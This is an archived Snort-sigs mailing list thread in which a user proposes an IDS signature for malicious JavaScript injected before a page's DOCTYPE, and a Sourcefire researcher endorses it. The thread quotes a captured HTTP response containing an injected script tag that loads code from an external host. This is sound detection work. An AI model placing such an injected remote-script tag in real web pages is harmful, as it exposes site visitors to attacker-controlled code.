Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SIG: Script before DOCTYPE

From: Alex Kirk <akirk () sourcefire com>
Date: Thu, 21 Jun 2012 15:37:26 -0400
That actually seems reasonable. You should only ever see <!DOCTYPE at the
start of a page, so I'd be surprised if this generates false positives.

Would you like this to be included in the VRT set?

On Thu, Jun 21, 2012 at 3:27 PM, Lay, James <james.lay () wincofoods com>wrote:


All,****

** **

Not sure if this is a good sig or not:****

** **

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE script
before DOCTYPE possible malicious redirect"; flow:to_client,established;
file_data; content:"</script><!DOCTYPE"; distance:0; nocase;
metadata:policy security-ips drop, service http;
classtype:web-application-attack; sid:xxxxxxx; rev:1;)****

** **

Many times that I’ve seen malicious JavaScript injected it’s usually right
at the top:****

** **

** **

HTTP/1.1 200 OK****

Date: Mon, 18 Jun 2012 17:29:21 GMT****

Server: Apache****

X-Powered-By: PHP/5.2.17****

Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/;
domain=www.glasstilestore.com; HttpOnly****

Expires: Thu, 19 Nov 1981 08:52:00 GMT****

Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0****

Pragma: no-cache****

Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT; path=/;
domain=www.glasstilestore.com; httponly****

Vary: Accept-Encoding,User-Agent****

X-UA-Compatible: IE=8****

Keep-Alive: timeout=3, max=100****

Connection: Keep-Alive****

Transfer-Encoding: chunked****

Content-Type: text/html; charset=UTF-8****

****

****

dd13****

<script src='http://httpjs.com/api&apos;
type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>****

<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="en" lang="en">****

<head>****

****

<!-- Google Website Optimizer Control Script -->****

<script>****

** **

I welcome any pointers or reasons this sig stinks…danke J****

** **

James ****


------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!





-- 
Alex Kirk
AEGIS Program Lead
Sourcefire Vulnerability Research Team
+1-410-423-1937
alex.kirk () sourcefire com

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: